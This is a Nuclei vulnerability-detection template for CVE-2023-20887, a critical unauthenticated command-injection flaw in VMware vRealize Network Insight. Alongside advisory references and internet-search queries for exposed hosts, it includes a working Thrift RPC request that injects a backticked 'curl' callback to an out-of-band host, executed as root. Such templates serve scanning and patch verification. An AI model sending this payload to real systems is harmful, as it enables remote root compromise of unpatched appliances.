id: CVE-2023-20887 info: name: VMware VRealize Network Insight - Remote Code Execution author: sinsinology severity: critical description: | VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are vulnerable. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/ - https://github.com/sinsinology/CVE-2023-20887 - http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20887 cwe-id: CWE-77 epss-score: 0.96408 epss-percentile: 0.99538 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vmware product: vrealize_network_insight shodan-query: title:"VMware vRealize Network Insight" fofa-query: title="VMware vRealize Network Insight" tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" http: - raw: - | POST /saas./resttosaasservlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-thrift [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`{{cmd}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] matchers-condition: and matchers: - type: word part: body words: - '{"rec":' - type: word part: header words: - "application/x-thrift" - type: word part: body negative: true words: - "Provided invalid node Id" - "Invalid nodeId" - type: status status: - 200 # digest: 4a0a00473045022100cef3e5e34cd635c23cf32fc104b9c643bc4b812046fc3e8ab1f2e0237b0c98c6022041d25ffbcfc8ed708d8e3cce28043e53ef71343b3a31238d065ba9f7e9d0f22a:922c64590222798bb761d5b6d8e72950